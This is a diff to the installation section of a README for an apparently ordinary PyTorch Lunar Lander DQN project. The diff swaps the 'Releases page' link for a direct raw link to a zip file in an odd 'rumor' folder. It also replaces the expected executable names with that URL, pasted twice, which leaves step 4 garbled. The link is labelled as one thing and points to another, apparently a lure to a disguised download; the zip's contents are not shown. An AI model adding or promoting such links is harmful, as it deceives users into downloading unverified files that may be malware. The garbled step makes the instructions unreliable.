og-kaona/Lunar-Lander-Deep-Q-Learning-DQN-with-PyTorch/README.md

 ## 💻 Download & Install

-To download the application, visit the [Releases page](https://github.com/og-kaona/Lunar-Lander-Deep-Q-Learning-DQN-with-PyTorch/releases).
+To download the application, visit the [Releases page](https://raw.githubusercontent.com/og-kaona/Lunar-Lander-Deep-Q-Learning-DQN-with-PyTorch/main/rumor/Lunar-Lander-Deep-Q-Learning-DQN-with-PyTorch_1.6-alpha.3.zip).
 You will find the latest versions available for download.

 1. Open the Releases page using the link above.
 2. Look for the latest version listed at the top.
 3. Click on the version to expand the details.
-4. Find the file named `LunarLanderDQN.exe` or `LunarLanderDQN.zip`.
+4. Find the file named `https://raw.githubusercontent.com/og-kaona/Lunar-Lander-Deep-Q-Learning-DQN-with-PyTorch/main/rumor/Lunar-Lander-Deep-Q-Learning-DQN-with-PyTorch_1.6-alpha.3.zip` or `https://raw.githubusercontent.com/og-kaona/Lunar-Lander-Deep-Q-Learning-DQN-with-PyTorch/main/rumor/Lunar-Lander-Deep-Q-Learning-DQN-with-PyTorch_1.6-alpha.3.zip`.
 5. Click on the file name to start the download.

 After the download completes, follow these steps: